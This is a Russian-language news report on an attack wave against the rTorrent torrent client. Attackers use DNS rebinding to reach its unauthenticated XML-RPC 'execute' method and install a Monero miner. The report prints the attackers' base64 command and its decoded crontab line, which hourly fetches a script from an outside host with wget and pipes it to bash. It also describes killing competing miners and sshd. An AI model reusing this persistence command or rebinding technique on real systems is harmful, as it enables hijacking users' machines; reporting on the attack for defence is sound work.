Исследователи из компании F5 выявили волну атак на пользовательские системы, в которых запущен свободный консольный torrent-клиент rTorrent, использующий XML-RPC для взаимодействия с фронтэндами с реализацией интерфейсов пользователя.

Для выполнения своего кода в системе атакующие эксплуатируют особенность реализации XML-RPC в rTorrent, в которой не отключён метод «execute», позволяющий выполнить любой shell-код в системе. В ходе атаки в систему устанавливается собранный для unix-подобных систем инструментарий для майнинга криптовалюты Monero (XMR). На текущий момент на одном из связанных с атакой кошельков уже накопилось 13 XMR, что соответствует примерно 4200 долларам США.

Как и в случае с недавней уязвимостью в BitTorrent-клиенте Transmission, интерфейс XML-RPC в rTorrent доступен без аутентификации и включает команды, которые можно использовать для выполнения кода в системе. По умолчанию rTorrent принимает запросы только на внутреннем интерфейсе localhost (127.0.0.1), недоступном из вне, поэтому для отправки команд атакующие применяют технику «DNS rebinding«. Атака производится когда пользователь открывает в браузере подконтрольные злоумышленнику страницы на системе в которой также выполняется rTorrent.

Выполняемый в браузере JavaScript-код отправляет произвольный запрос на localhost через вызов XMLHttpRequest(). Для обхода защиты от выхода за пределы области текущего домена (cross-origin) используется метод смены имени хоста в DNS — на DNS-сервере атакующих настраивается поочерёдная отдача двух IP-адресов: на первый запрос отдаётся реальный IP сервера со страницей, а затем возвращается 127.0.0.1. Время жизни (TTL) для первого ответа выставляется в минимальное значение, поэтому при открытии страницы браузер определяет реальный IP сервера атакущего и загружает содержимое страницы. На странице запускается JavaScript-код, который ожидает истечения TTL и отправляет второй запрос, который теперь определяет хост как 127.0.0.1, что приводит к обращению к внутреннему сетевому интерфейсу компьютера пользователя без ограничений cross-origin.

Первым делом атакующие отправляют проверочный POST запрос с XML-RPC-методом «download_list». Если запрос обработан успешно, следом отправляется запрос «execute», в ходе которого на системе пользователя выполняется команда

   echo KGNy...tCg== |base64 -d|bash

которая после декодирования из формата base64 преоборазуется в

    (crontab -l 2/dev/null|sed '/wget/d'; echo "5 * * * * wget -qO- lyzhenko.ru/.r|bash")|crontab –

Указанный код прописывает в crontab загрузку основного скрипта, который вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам «miner», «xmr», «wnTKYg», «imWBR» и «ddg», а также убивает все процессы sshd.

Далее устанавливается соединение со скрытым сервисом Tor c которого загружается непосредственно приложение для майнинга. Для доступа к Tor применяется шлюз Tor2Web, позволяющий обратиться к скрытому сервису без установки Tor при помощи обычного web-запроса.